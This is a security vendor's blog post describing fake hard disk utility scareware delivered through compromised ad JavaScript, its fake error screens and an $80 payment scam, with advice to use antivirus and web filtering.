Beware of the New Fake Hard Disk Utility Scareware

Print Friendly, PDF & Email

By Dave Michmerhuizen, Security Researcher

Fake Hard Disk Utility scareware is a new type of malware that is trying to one-up the fake anti-spyware scams that have been common for years. While fake anti-spyware tries to convince you that your computer is infected with spyware and malware, Fake Hard Disk Utility scareware tries to convince you that your computer is falling apart.  It has appeared under a number of names, HDD Defragmenter, Quick Defragmenter, Win HDD and Win Defrag. The most common variety Barracuda Labs has seen in the wild is named HDD Diagnostic.

This nasty malware attacks a victim's computer using one of the sneakiest tricks in the book – the malicious advertisement, or “malvertisement”.   Most Internet ads are included on Web pages via small bits of JavaScript code. The ad is loaded from an ad server elsewhere on the Internet. However, it is becoming more common for these servers to get compromised, and ultimately serve up malicious or suspicious content themselves (see earlier Barracuda Labs post regarding compromised ads on USAToday.com – http://www.barracudalabs.com/wordpress/index.php/2009/05/07/usatoday-com-ads-redirect-to-rogue-av/).

The attack originated from a legitimate Website that includes advertisements from perconel.com.  These ads are added to the Web page using JavaScript which is heavily encoded.  In most cases the ad displays fine, but sometimes the ad server includes a little extra JavaScript that causes problems. Ultimately, that encoded JavaScript decodes to this:

The extra JavaScript tells the browser to open a hidden window and access a domain that begins attacking the local computer.  A variety of exploits are attempted resulting in the execution of a downloader which in turn downloads the Fake Hard Disk Utility scareware:

We particularly liked the message on this screen – “Hard Drive not found.  Missing hard drive.”

The scareware continues to display error messages and block other user programs from running.  Occasionally it will reboot the computer and then change the desktop to an ominous black.  All of this is to panic the user into clicking on the button to “Enable Defrag HDD Repair.”   Doing so brings up the money screen:

The contents of this form are actually from another bogus site named secure.billsecurepay.com.  The scammer tries to make the user feel even more “secure” by continuously using the word over and over again. However, the only thing this actually “secures” is a transfer of $80 from the victim to the scammer.

We believe that this new malware is a reaction to the education that has been done regarding fake anti-spyware scareware.  As such attacks become common knowledge they lose their effectiveness.  This new attack is the same sort of wolf  in new clothing and less likely to be familiar to many computer users. This is yet another reminder to pay attention to your online activities, run a reputable anti-virus solution and filter your Web traffic.

Barracuda Web Filters and the Barracuda Web Filtering Service stop the download of this threat.

Scroll to top
Tweet
Share
Share